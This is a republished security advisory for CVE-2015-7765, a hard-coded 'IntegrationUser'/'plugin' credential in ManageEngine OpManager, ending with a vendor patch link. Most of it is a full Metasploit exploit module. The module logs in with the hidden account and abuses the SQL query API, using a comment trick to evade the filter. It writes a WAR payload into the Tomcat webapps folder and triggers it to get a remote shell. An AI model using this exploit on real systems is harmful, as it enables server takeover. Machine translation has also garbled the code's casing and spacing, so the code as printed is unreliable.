ZOHO ManageEngine OpManager hard-coded credential Vulnerability (CVE-2015-7765)

Source: Internet
Author: User
Tags cve opmanager

ZOHO ManageEngine OpManager hard-coded credential Vulnerability (CVE-2015-7765)
ZOHO ManageEngine OpManager hard-coded credential Vulnerability (CVE-2015-7765)


Release date:
Updated on:

Affected Systems:

zoho ManageEngine OpManager <= 11.5 build 11600

Description:

CVE (CAN) ID: CVE-2015-7765

ZOHO ManageEngine OpManager is a network performance management software.

ZOHO ManageEngine OpManager 11.5 build 11600 and earlier versions use a hard-coded password "plugin" for the IntegrationUser account. authenticated remote users can exploit this vulnerability to obtain administrator access permissions.

<* Source: xistence (xistence@0x90.nl)

Link: http://seclists.org/fulldisclosure/2015/Sep/66
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

Require 'msf/core'

Class Metasploit3 <Msf: Exploit: Remote
# It removes large object in database, shoudn't be a problem, but just in case ....
Rank = ManualRanking

Include Msf: Exploit: Remote: HttpClient
Include Msf: Exploit: FileDropper

Def initialize (info = {})
Super (update_info (info,
'Name' => 'manageengine OpManager Remote Code Execution ',
'Description' => % q {
This module exploits a default credential vulnerability in ManageEngine OpManager, where
Default hidden account "IntegrationUser" with administrator privileges exists. The account
Has a default password of "plugin" which can not be reset through the user interface.
Log-in and abusing the default administrator's SQL query functionality, it's possible
Write a WAR payload to disk and trigger an automatic deployment of this payload. This
Module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Xistence <xistence [at] 0x90. nl> '# Discovery, Metasploit module
],
'References '=>
[
['Edb', '123'],
],
'Platform' => ['java'],
'Arch '=> ARCH_JAVA,
'Targets' =>
[
['Manageengine OpManager v11.6 ', {}]
],
'Privileged' => false,
'Disclosuredate' => 'sep 14 2015 ',
'Defaulttarget' => 0 ))
End

Def uri
Target_uri.path
End

Def check
# Check version
Vprint_status ("# {peer}-Trying to detect ManageEngine OpManager ")

Res = send_request_cgi ({
'Method' => 'get ',
'Uris '=> normalize_uri (uri, 'loginpage. do ')
})

Unless res & res. code = 200
Return Exploit: CheckCode: Safe
End

If res. body = ~ /OpManager. * v \. ([0-9] + \. [0-9] +) <\/span>/
Version = $1
If Gem: Version. new (version) <= Gem: Version. new ('11. 6 ')
Return Exploit: CheckCode: Appears
Else
# Patch unknown
Return Exploit: CheckCode: Detected
End
Elsif res. body = ~ /OpManager/
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End

Def SQL _query (key, query)
Res = send_request_cgi ({
'Method' => 'post ',
'Uri' => normalize_uri (uri, 'api ', 'json', 'admin', 'submitquery '),
'Vars _ get' =>{ 'apikey' => key },
'Vars _ Post' => {'query' => query}
})

Unless res & res. code = 200
Fail_with (Failure: Unknown, "# {peer}-Query was not succesful! ")
End

Res
End

Def exploit
Print_status ("# {peer}-Access login page ")
Res = send_request_cgi ({
'Method' => 'post ',
'Uris '=> normalize_uri (uri, 'jsps', 'login. do '),
'Vars _ Post' => {
'Domainname' => 'null ',
'Authtype' => 'localuserlogin ',
'Username' => 'integrationuser', # Hidden user
'Password' => 'plugin' # password of hidden user
}
})

If res & res. code = 302
Redirect = URI (res. headers ['location']). to_s.gsub (/#\//,"")
Print_status ("# {peer}-Location is [# {redirect}]")
Else
Fail_with (Failure: Unknown, "# {peer}-Access to login page failed! ")
End


# Follow redirection process
Print_status ("# {peer}-Following redirection ")
Res = send_request_cgi ({
'Url' => redirect,
'Method' => 'get'
})

If res & res. code = 200 & res. body = ~ /Window. OPM. apiKey = "([a-z0-9] + )"/
Api_key = $1
Print_status ("# {peer}-Retrieved API key [# {api_key}]")
Else
Fail_with (Failure: Unknown, "# {peer}-Redirect failed! ")
End

App_base = rand_text_alphanumeric (4 + rand (32-4 ))
War_payload = payload. encoded_war ({: app_name => app_base}). to_s
War_payload_base64 = Rex: Text. encode_base64 (war_payload). gsub (/\ n /,'')

Print_status ("# {peer}-Executing SQL queries ")

# Remove large object in database, just in case it exists from previous exploit attempts
SQL = 'select lo_unlink (-1 )'
SQL _query (api_key, SQL)

# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
SQL = 'select lo_create (-1 )'
Result = SQL _query (api_key, SQL)
If result. body = ~ /Lo_create ":( [0-9] + )}/
Lo_id = $1
Else
Fail_with (Failure: Unknown, "# {peer}-ipvs Large Object ID not found! ")
End

# Insert WAR payload into the pg_largeobject table. We have to use/**/to bypass OpManager 'sa checks for INSERT/UPDATE/DELETE, etc.
SQL = "INSERT/**/INTO pg_largeobject (loid, pageno, data) VALUES (# {lo_id}, 0, DECODE ('# {war_payload_base64}', 'base64 '))"
SQL _query (api_key, SQL)

# Export our large object id data into a WAR file
SQL = "SELECT lo_export (# {lo_id}, '../.. // tomcat // webapps // # {app_base}. war ');"
SQL _query (api_key, SQL)

# Remove our large object in the database
SQL = 'select lo_unlink (-1 )'
SQL _query (api_key, SQL)

Register_file_for_cleanup ("tomcat // webapps // # {app_base}. war ")
Register_file_for_cleanup ("tomcat // webapps // # {app_base }")

10. times do
Select (nil, 2)

# Now make a request to trigger the newly deployed war
Print_status ("# {peer}-Attempting to launch payload in deployed WAR ...")
Res = send_request_cgi (
{
'Uri '=> normalize_uri (target_uri.path, app_base, "# {Rex: Text. rand_text_alpha (rand (8) + 8)}. jsp "),
'Method' => 'get'
})
# Failure. The request timed out or the server went away.
Break if res. nil?
# Success! Triggered the payload, shocould have a shell incoming
Break if res. code = 200
End

End

End

Suggestion:

Vendor patch:

Zoho
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability

This article permanently updates the link address:

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.